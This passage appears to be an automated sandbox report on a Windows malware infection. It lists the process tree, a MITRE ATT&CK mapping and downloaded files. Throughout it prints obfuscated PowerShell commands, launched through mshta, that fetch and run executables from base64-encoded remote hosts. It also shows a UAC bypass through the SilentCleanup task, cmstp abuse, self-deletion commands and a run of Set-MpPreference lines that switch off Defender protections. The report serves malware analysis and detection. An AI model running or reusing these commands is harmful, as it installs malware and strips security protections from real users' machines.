$kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2224

C:\Users\Public\omx.exe
"C:\Users\Public\omx.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5072

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2528

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3884

C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:476

C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:2440

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 2440 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\897638703164392\\* & exit
8⤵
PID:4152

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 2440
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Users\Public\omx.exe
"C:\Users\Public\omx.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4440

C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe
"C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4244

C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe
"C:\Users\Admin\AppData\Local\Temp\WbzfV6CULA.exe"
8⤵
- Executes dropped EXE
PID:4972

C:\Users\Admin\AppData\Local\Temp\ys0nsVDvlk.exe
"C:\Users\Admin\AppData\Local\Temp\ys0nsVDvlk.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:4724

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
8⤵
PID:5296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\XqKMNtso.bat" "
9⤵
PID:5124

C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
10⤵
- Modifies registry key
PID:4320

C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
10⤵
- Modifies registry key
PID:1872

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
10⤵
PID:1312

C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
10⤵
- Modifies registry key
PID:2168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\XqKMNtso.bat" "
9⤵
PID:3896

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
8⤵
PID:4812

C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe
"C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5044

C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe
"C:\Users\Admin\AppData\Local\Temp\k7OXQaTnHC.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2180

\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\fbsgi511.inf
9⤵
PID:5028

C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe
"C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4848

C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe
"C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"
8⤵
- Executes dropped EXE
PID:4808

C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe
"C:\Users\Admin\AppData\Local\Temp\r9bcktZEdK.exe"
8⤵
- Executes dropped EXE
- Windows security modification
PID:4872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\omx.exe"
7⤵
PID:4496

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
8⤵
- Delays execution with timeout.exe
PID:4948

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:2012

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752

C:\Users\Public\xvb.exe
"C:\Users\Public\xvb.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
"C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4412

C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
"C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5372

C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
"{path}"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 1028 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\919755189621101\\* & exit
9⤵
PID:2420

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 1028
10⤵
- Kills process with taskkill
PID:5440

C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
"{path}"
7⤵
- Executes dropped EXE
PID:3736

C:\Users\Public\xvb.exe
"{path}"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:4204

C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe
"C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6116

C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe
"C:\Users\Admin\AppData\Local\Temp\owIRnLSEZY.exe"
8⤵
- Executes dropped EXE
PID:5832

C:\Users\Admin\AppData\Local\Temp\tr1M5TzQok.exe
"C:\Users\Admin\AppData\Local\Temp\tr1M5TzQok.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5668

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
8⤵
PID:2536

C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe
"C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2616

C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe
"C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"
8⤵
- Executes dropped EXE
PID:4304

C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe
"C:\Users\Admin\AppData\Local\Temp\ZipHA1oS1L.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3976

\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\pcidrymb.inf
9⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe
"C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5496

C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe
"C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"
8⤵
- Executes dropped EXE
PID:4160

C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe
"C:\Users\Admin\AppData\Local\Temp\viu1oJ97BK.exe"
8⤵
- Executes dropped EXE
- Windows security modification
PID:5476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
9⤵
PID:6024

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xvb.exe"
7⤵
PID:5548

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
8⤵
- Delays execution with timeout.exe
PID:4264

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\SysWOW64\timeout.exe
timeout 2
3⤵
- Delays execution with timeout.exe
PID:2468

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:4464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4536

C:\Users\Public\ywq.exe
"C:\Users\Public\ywq.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4824

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5080

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5052

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:4620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:3892

C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Windows\temp\mmfwhmpi.exe
2⤵
PID:2044

C:\Windows\temp\mmfwhmpi.exe
C:\Windows\temp\mmfwhmpi.exe
3⤵
- Executes dropped EXE
PID:1872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cmstp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4344

C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Windows\temp\ipjk2yso.exe
2⤵
PID:4312

C:\Windows\temp\ipjk2yso.exe
C:\Windows\temp\ipjk2yso.exe
3⤵
- Executes dropped EXE
PID:4836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
PID:5224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
4⤵
PID:5660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
4⤵
PID:2792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
4⤵
PID:5836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
4⤵
PID:2404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
4⤵
PID:4348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
4⤵
PID:3920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
4⤵
PID:4360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
4⤵
PID:4660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
4⤵
PID:5688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
4⤵
PID:4640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
4⤵
PID:6132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
4⤵
PID:4036

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cmstp.exe /F
2⤵
- Kills process with taskkill
PID:5012

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4

Download Submit
